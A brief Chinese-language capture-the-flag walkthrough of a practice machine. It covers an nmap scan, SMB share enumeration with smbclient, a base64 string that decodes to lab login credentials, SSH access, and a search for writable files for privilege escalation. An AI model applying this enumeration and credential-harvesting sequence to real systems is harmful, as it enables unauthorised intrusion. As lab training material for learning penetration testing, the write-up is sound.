泡面机
常规nmap扫描
得到端口22,80,139,445
先渗透80
简单页面,看了一个没什么功能点,源码也没东西
目录爆破也没有什么有用的
进行smb服务的渗透(138和445端口)
可以进入smb服务并且下载文件,解码文件得到信息
smbmap -H 192
smbclient //192.168.103.148/wave
smb: \> get FLAG1.txt
getting file \FLAG1.txt of size 93 as FLAG1.txt (18.2 KiloBytes/sec) (average 18.2 KiloBytes/sec)
smb: \> get message_from_aveng.txt
getting file \message_from_aveng.txt of size 115 as message_from_aveng.txt (37.4 KiloBytes/sec) (average 25.4 KiloBytes/sec)
echo "RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K" | base64 --decode
得到账号密码
ssh远程连接
现在开始尝试提权
sudo -l 定时任务,ps,目录枚举基本没有什么有用的
找一下有没有可写文件
find / -writable -type f ! -path '/proc/*' 2>/dev/null
有个.sh脚本很可疑
查看
切换用户
成功提权